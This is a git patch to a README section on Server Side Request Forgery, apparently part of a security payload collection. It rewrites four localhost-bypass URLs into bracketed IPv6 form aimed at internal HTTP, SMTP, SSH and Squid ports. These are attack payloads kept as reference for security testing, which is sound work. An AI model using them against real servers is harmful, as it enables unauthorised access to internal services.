From 391b18cf206ecb9d38400f4d9611bf4bb57e3747 Mon Sep 17 00:00:00 2001 From: Jitendra Patro <86168235+Xhoenix@users.noreply.github.com> Date: Wed, 28 Jun 2023 15:50:43 +0530 Subject: [PATCH] update bypass localhost with [::] payloads --- Server Side Request Forgery/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 000a217..0c846a8 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -102,10 +102,10 @@ http://[::]:3128/ Squid ``` ```powershell -http://0000::1:80/ -http://0000::1:25/ SMTP -http://0000::1:22/ SSH -http://0000::1:3128/ Squid +http://[0000::1]:80/ +http://[0000::1]:25/ SMTP +http://[0000::1]:22/ SSH +http://[0000::1]:3128/ Squid ``` ### Bypass localhost with a domain redirection